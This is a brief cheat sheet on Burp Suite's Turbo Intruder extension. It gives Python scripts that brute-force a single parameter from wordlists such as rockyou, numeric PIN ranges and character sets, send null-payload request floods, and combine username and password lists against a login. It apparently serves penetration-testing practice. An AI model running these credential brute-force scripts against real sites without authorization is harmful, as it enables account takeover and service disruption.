Turbo Intruder in Burp Suite
Turbo Intruder is the Burp Suite extension for brute forcing or fuzzing to websites.
Using Single Parameter
Set “%s” to the parameter for brute force.
For example, set %s as the value of password then we can brute force to password.
Here is the Python cheat sheet. We can use either code depending on the situation.
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=5,
pipeline=False
)
# Brute force (wordlist)
for word in open('/usr/share/wordlists/rockyou.txt'):
engine.queue(target.req, word.rstrip())
# Brute force (0 - 255)
for i in range(0, 255):
engine.queue(target.req, str(i))
# Brute force (0000 - 9999)
for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
engine.queue(target.req, word.rstrip())
# Brute Force (alphabet)
for word in open('/usr/share/seclists/Fuzzing/char.txt'):
engine.queue(target.req, word.rstrip())
# Brute Force (alphanum upper-lower)
for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
engine.queue(target.req, word.rstrip())
# Null payloads (infinite loop)
i = 0
while i < 1:
engine.queue(target.req, None)
# Null payloads (100 loops)
i = 0
while i < 100:
engine.queue(target.req, None)
i += 1
def handleResponse(req, interesting):
if interesting:
table.add(req)
Using Multiple Parameters
In addition to simple parameter, we can apply multiple parameters e.g. username and password.
Here is the Python script. We need to apply multiple words for each parameter as below.
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=False)
# Set multiple words for parameters.
for word1 in open('/path/to/usernames'):
for word2 in open('/path/to/passwords'):
engine.queue(target.req, [word1.rstrip(), word2.rstrip()])
def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
if req.status != 404:
table.add(req)